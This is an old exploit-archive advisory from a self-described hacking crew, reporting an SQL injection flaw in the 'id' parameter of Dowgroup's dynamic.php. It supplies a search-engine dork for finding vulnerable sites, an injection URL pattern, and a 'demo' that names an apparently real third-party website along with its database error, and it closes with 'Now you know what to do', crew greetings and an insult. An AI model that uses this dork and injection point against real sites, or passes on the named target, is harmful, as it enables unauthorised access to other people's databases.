Dowgroup (dynamic.php id) SQL Injection Vulnerability

2010-06-29 16:03:57

===============================================================
Dowgroup (dynamic.php?) id SQL Injection Vulnerability
===============================================================

####################################
[+] Title: Dowgroup (dynamic.php?) id SQL Injection Vulnerability
[+] Author: **RoAd_KiLlEr**
[+] Software Link:http://www.dowgroup.com
[+] Tested on Win Xp Sp2/Sp3
[+] Where : From Remote
####################################
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
#####ExPl0iT3d by **RoAd_KiLlEr**######

[~] DORK: "powered by www.dowgroup.com"

####################################

[~]ExPl0iT : http://127.0.0.1//dynamic.php?id=[SQL-injection]


[~]Dem0: http://www.360mediadubai.com/dynamic.php?id='9 <= Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/media/public_html/dynamic.php on line 9

You have Trrigered a Error That means that is vulnerable to Sql injection :). Now you know what to do

####################################
[!]Albanian Hacking Crew
####################################
[!]**RoAd_KiLlEr** says: Fuck You Eragon , Ja baba po ti ban Exploitat Shko perdori , Llamer ;)
####################################
[!]Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | All Members From A-H-Crew.Net & All Albanian/Kosova Hackers | & All My Friends
####################################
[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail | NEO from DATA ir Security Group | MaFFiTeRRoR
####################################
[!]MaiL: sukihack[at]gmail[dot]com
####################################
[!]Proud 2 b3:Albanian & Muslim
####################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.